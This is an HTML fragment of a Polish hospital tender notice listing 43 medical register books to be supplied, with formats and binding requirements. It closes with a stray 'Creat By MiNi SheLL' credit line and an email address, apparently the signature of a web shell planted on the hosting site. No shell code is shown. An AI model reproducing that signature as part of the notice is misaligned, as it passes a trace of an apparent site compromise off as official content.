<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2 - księgi medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	K.005	Księga fenyloketonuria hypotyreoza / Oddz. Nowor./ 	2	A4 / 60 kartek, pionowa
2.	K.010	Księga badań grup krwi / 	10	A4/ 200 kartek, pozioma
3.	K.011	Książka badań przeciwciał  i kwalifikacji do podania immunoglobuliny anty-d /	2	A4 / 200 kartek, pozioma
4.	K.014	Księga ewidencji dializ	4	A4 / 100 kartek, pozioma
5.	K.020	Księga przyjęć - por. G-P. 	10	A4 / 100 kartek, pozioma
6.	K.022	Księga pracowni hematologicznej II 	6	A4 / 200 kartek, pionowa
7.	K.023	Księga hemodializ 	80	A4, 80 kartek,  2 otwory na środku - do segreg., zszywacze
8.	K.029	Książka kontroli środków odurzających i psychotropowych	20	 A4 MZF-50, 80 kartek numeracja + otwory do przesznurowania
9.	K.031	Księga noworodków	2	A4 / 150 kartek, pozioma
10.	K.032	Księga odbioru wyników badań (L.C.) 	5	A4 / 100 kartek, pionowa
11.	K.036	Księga pracowni immunochemicznej I	20	A4 / 100 kartek, pionowa
12.	K.037	Księga pracowni analitycznej - bad. Kału 	2	A4 / 200 kartek, pionowa
13.	K.038	Księga pracowni analitycznej - bad. Moczu 	10	A4 / 200 kartek, pionowa
14.	K.039	Księga pracowni analitycznej CARDIAC	6	A4 / 200 kartek, pionowa
15.	K.040	Księga pracowni analitycznej hormony tarczycy 	6	A4 / 200 kartek, pionowa
16.	K.041	Książkapracowni biochemicznej 	100	A4 / 200 kartek, pionowa
17.	K.042	Księga pracowni cytologicznej 	2	A4 / 200 kartek, pionowa
18.	K.046	Księga profilaktyka konfliktu Rh - GIN-POŁ.	1	A4 / 200 kartek, pozioma
19.	K.047	Książka prób zgodności 	6	A4 / 200 kartek, pozioma
20.	K.048	Książka przychodów i rozchodów preparatów krwiopochodnych banku krwi 	2	A4 / 200 kartek, pozioma
21.	K.049	Księga pracowni immunochemicznej II	8	A4 / 200 kartek, pionowa
22.	K.050	Księga raportów lekarskich	40	A4 nr 100 kartek, numeracja stron, otwory do przesznurowania, pionowa
23.	K.053	Książka transfuzyjna	8	A4 / 100 kartek, pozioma
24.	K.055	Księga wymazów cytologicznych- Por.K 	2	A4 / 200 kartek, pionowa
25.	K.061	Księga przyjęć - AOS	70	A4 / 100 kartek, pionowa
26.	K.062	Księga główna przyjęć i wypisów	20	A4 / 100 kartek, pozioma
27.	K.063	Księga chorych oddzialu	30	A4 / 100 kartek, pozioma
28.	K.064	Księga raportów pielęgniarskich	250	A4 / 100 kartek, pionowa
29.	K.065	Księga zabiegów 	200	A4 / 100 kartek, pozioma
30.	K.068	Księga rejestracji	2	A4 / 100 kartek, pionowa
31.	K.070	Księga pracowni diagnostycznej - pracownia endoskopowa	12	A4 / 100 kartek, pionowa
32.	K.071	Księga bloku operacyjnego	30	A4 samokopia - dwa kol.  / 100 kartek, pionowa
33.	K.073	księga ewidencji pacjentów w pracowni endoskopii	2	A4 / 100 kartek, pionowa
34.	K.079	Księga pracowni  bakteriologicznej	15	2/3 A3/ 200 kartek,               29cm x 29cm
35.	K.081	Księga pracowni diagnostycznej np.: usg,rtg,tk,mm	65	A4 / 100 kartek, pionowa
36.	K.082	Księga Sali porodowej 	2	A4 / 200 kartek, pozioma
37.	K.084	Księga zabiegów leczniczych ZLU	10	A3/200 kartek, pozioma
38.	K.089	Skorowidz do księgi głównej szpitala	5	2/3 A4, pionowa
39.	K.090	Księga odmów, przyjęć i porad ambulatoryjnych	15	A4 / 100 kartek, pozioma
40.	K.091	Księga porad ambulatoryjnych POZ	30	A4 / 200 kartek, pozioma
41.	K.092	Księga dysponenta zespołów ratownictwa medycznego	10	A4 / 100 kartek, pionowa
42.	K.093	Księga wyjazdów - transporty sanitarne	10	A4 / 100 kartek, pionowa
43.	K.094	Książka ewidencji grup krwi 	2	A4 / 200 kartek, pozioma

Wymagania dotyczące wszystkich ksiąg/ książek:
1. Twarda oprawa.
2. Szyte nićmi i klejone.
3. Numeracja stron.
4. Strona tytułowa - wg wzoru załączonego w wersji elektronicznej - umieszczana jest na okładce.
5. Druki powinny być wykonane na papierze offsetowym o gramaturze 80g/m2.
6. Dotyczy: K.071 - Księga Bloku operacyjnego - samokopiująca, 200 kartek: kartka kopii ma taką samą numerację jak oryginał (co daje w sumie 100 stron), kopia koloru jasnozielonego, perforowana..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.11.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com